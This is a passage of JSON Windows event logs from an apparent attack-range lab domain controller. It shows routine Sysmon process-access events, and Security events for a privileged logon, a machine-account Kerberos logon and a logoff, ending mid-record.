{"EventTime":"2020-08-01 05:50:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4145,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:55.508\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:55.508","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4146,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:55.508\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:55.508","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4147,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:55.508\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:55.508","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4148,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:55.508\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:55.508","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4149,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:50:55.508\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-02BF-5F25-0000-00101C150600}\r\nTargetProcessId: 4728\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:50:55.508","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-02BF-5F25-0000-00101C150600}","TargetProcessId":"4728","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:50:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220420,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x617F7\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x617f7","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 05:51:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220421,"ProcessID":864,"ThreadID":1368,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x617F7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{433511B1-83A7-FED9-9147-785D15F197B0}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t::1\r\n\tSource Port:\t\t54900\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x617f7","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{433511B1-83A7-FED9-9147-785D15F197B0}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"::1","IpPort":"54900","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:51:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:50:58","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220422,"ProcessID":864,"ThreadID":4072,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x617F7\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-881393$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x617f7","LogonType":"3","EventReceivedTime":"2020-08-01 05:51:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4150,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:30.511","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","TargetProcessId":"1144","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8d58|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4151,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:30.511\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nTargetProcessId: 1144\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+8e42|c:\\windows\\system32\\lsm.dll+8d96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 